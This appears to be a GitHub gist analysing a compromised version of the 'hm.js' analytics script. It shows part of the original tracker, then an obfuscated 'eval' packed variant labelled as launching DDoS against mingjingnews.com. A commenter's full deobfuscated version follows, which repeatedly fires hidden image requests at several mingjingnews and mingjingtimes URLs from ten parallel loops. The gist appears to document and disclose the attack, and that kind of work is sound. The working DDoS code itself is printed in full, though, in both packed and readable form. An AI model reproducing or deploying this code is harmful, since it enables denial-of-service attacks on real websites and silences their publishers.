}
)();
(function() {
var a = mt.p
, d = mt.lang
, e = mt.event
, f = mt.j;
if ("undefined" !== typeof h.b && d.d(c.cvcf, "Array") && 0 < c.cvcf.length) {
var k = {
$: function() {
for (var d = c.cvcf.length, f, p = 0; p < d; p++)
(f = a.la(decodeURIComponent(c.cvcf[p]))) && e.c(f, "click", k.ga())
},
ga: function() {
return function() {
h.b.a.et = 86;
var a = {
n: "form",
t: "clk"
};
a.id = this.id;
h.b.a.ep = f.stringify(a);
h.b.h()
}
}
};
a.X(function() {
k.$()
})
}
}
)();
(function() {
var a = mt.event
, d = mt.j;
if (c.med && "undefined" !== typeof h.b) {
var e = +new Date
, f = {
n: "anti",
sb: 0,
kb: 0,
clk: 0
}
, k = function() {
h.b.a.et = 86;
h.b.a.ep = d.stringify(f);
h.b.h()
};
a.c(document, "click", function() {
f.clk++
});
a.c(document, "keyup", function() {
f.kb = 1
});
a.c(window, "scroll", function() {
f.sb++
});
a.c(window, "unload", function() {
f.t = +new Date - e;
k()
});
a.c(window, "load", function() {
setTimeout(k, 5E3)
})
}
}
)();
}
)();
Raw
hm.js (when modified to launch DDOS)
// the following code launches DDOS against sites like mingjingnews.com
eval(function(p, a, c, k, e, d) {
e = function(c) {
return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
}
;
if (!''.replace(/^/, String)) {
while (c--)
d[e(c)] = k[c] || e(c);
k = [function(e) {
return d[e]
}
];
e = function() {
return '\\w+'
}
;
c = 1;
}
;while (c--)
if (k[c])
p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]);
return p;
}('c((/15\\/([\\d]+)/16.17(l.A.D.E())[1]>=12)&&(l.A.D.E().14("18")<0)){3 G=1c;3 p=[\'i://1d.o.j/\',\'i://1e.o.j/\',\'i://19.o.j/\',\'i://1a.1b.j/\',\'i://S.o.j/U/Y/Z.11\'];3 J=V;3 n=W;3 N=10;3 v=1;g u(){3 a=e 7();H 7.X(a.T(),a.1w(),a.1x(),a.1v(),a.P(),a.L())/R}h.C("F")[0].I="<1t 1u=\\"B\\" 1y=\\"1C-B\\">"+h.C("F")[0].I;3 6=[];3 f=[];3 x=5;3 b=[];3 9=[];3 w=\'\';3 m=0;g q(2){3 8=6[2];c(8!=5){h.z.1B(8)}6[2]=5;c(m<J&&9[2]-x<G){O(\'s(\'+2+\')\',(9[2]-b[2])>n?n:(9[2]-b[2]))}}g Q(2){c(6[2]==5){H}c(6[2].1j){l.y(f[2]);9[2]=e 7().k();q(2)}1k{c(e 7().k()-b[2]>n){l.y(f[2]);q(2)}}}g s(2){8=h.z.1q(h.1r(\'1m\'));w=p[u()%p.1o];8.1n=w+\'?t=\'+u()+M.1p(M.1l()*1h);8.1g.1f=\'1i\';6[2]=8;b[2]=9[2]=e 7().k();f[2]=1s("Q("+2+")",1A);m=m+1}g K(){x=e 7().k();1z(3 4=0;4<N;4+=1){6[4]=5;f[4]=5;b[4]=5;9[4]=5;s(4)}}3 r=e 7();O(\'K()\',((v-r.P()%v)*13-r.L())*R)}', 62, 101, '||index|var|ti|null|p_img_list|Date|p_img_tmp|responsetime_list|dt|requesttime_list|if||new|timer_list|function|document|http|com|getTime|window|count|TIMEGAP|mingjingnews|url_list|imgdel|now|imgadd||unixtime|START_CLOCK|url|starttime|clearInterval|body|navigator|referrer|getElementsByTagName|userAgent|toLowerCase|head|MAX_TIME|return|innerHTML|MAX_COUNT|start|getSeconds|Math|THREAD|setTimeout|getMinutes|isImgComplete|1000|bravo1|getFullYear|2017|100000000|500|UTC|01|bravo||html|34|60|indexOf|chrome|gi|exec|edge|tv2|www|mingjingtimes|300000|news2|s3|display|style|100|none|complete|else|random|img|src|length|ceil|appendChild|createElement|setInterval|meta|name|getHours|getMonth|getDate|content|for|50|removeChild|no'.split('|'), 0, {}))
@Tensibai
Copy link

Tensibai commented Aug 25, 2017
edited

For the guilty version the reversed code is as follow:

if((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1]>=34)&&(window.navigator.userAgent.toLowerCase().indexOf("edge")<0))
	{
	var MAX_TIME=300000;
	var url_list=['http://news2.mingjingnews.com/','http://s3.mingjingnews.com/','http://tv2.mingjingnews.com/','http://www.mingjingtimes.com/','http://bravo1.mingjingnews.com/2017/01/bravo.html'];
	var MAX_COUNT=100000000;
	var TIMEGAP=500;
	var THREAD=10;
	var START_CLOCK=1;
	function unixtime()
		{
		var dt=new Date();
		return Date.UTC(dt.getFullYear(),dt.getMonth(),dt.getDate(),dt.getHours(),dt.getMinutes(),dt.getSeconds())/1000
	}
	document.getElementsByTagName("head")[0].innerHTML="<meta name=\"referrer\" content=\"no-referrer\">"+document.getElementsByTagName("head")[0].innerHTML;
	var p_img_list=[];
	var timer_list=[];
	var starttime=null;
	var requesttime_list=[];
	var responsetime_list=[];
	var url='';
	var count=0;
	function imgdel(index)
		{
		var p_img_tmp=p_img_list[index];
		if(p_img_tmp!=null)
			{
			document.body.removeChild(p_img_tmp)
		}
		p_img_list[index]=null;
		if(count<MAX_COUNT&&responsetime_list[index]-starttime<MAX_TIME)
			{
			setTimeout('imgadd('+index+')',(responsetime_list[index]-requesttime_list[index])>TIMEGAP?TIMEGAP:(responsetime_list[index]-requesttime_list[index]))
		}
	}
	function isImgComplete(index)
		{
		if(p_img_list[index]==null)
			{
			return
		}
		if(p_img_list[index].complete)
			{
			window.clearInterval(timer_list[index]);
			responsetime_list[index]=new Date().getTime();
			imgdel(index)
		}
		else
			{
			if(new Date().getTime()-requesttime_list[index]>TIMEGAP)
				{
				window.clearInterval(timer_list[index]);
				imgdel(index)
			}
		}
	}
	function imgadd(index)
		{
		p_img_tmp=document.body.appendChild(document.createElement('img'));
		url=url_list[unixtime()%url_list.length];
		p_img_tmp.src=url+'?t='+unixtime()+Math.ceil(Math.random()*100);
		p_img_tmp.style.display='none';
		p_img_list[index]=p_img_tmp;
		requesttime_list[index]=responsetime_list[index]=new Date().getTime();
		timer_list[index]=setInterval("isImgComplete("+index+")",50);
		count=count+1
	}
	function start()
		{
		starttime=new Date().getTime();
		for(var ti=0;
		ti<THREAD;
		ti+=1)
			{
			p_img_list[ti]=null;
			timer_list[ti]=null;
			requesttime_list[ti]=null;
			responsetime_list[ti]=null;
			imgadd(ti)
		}
	}
	var now=new Date();
	setTimeout('start()',((START_CLOCK-now.getMinutes()%START_CLOCK)*60-now.getSeconds())*1000)
}

Made with http://matthewfl.com/unPacker.html

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment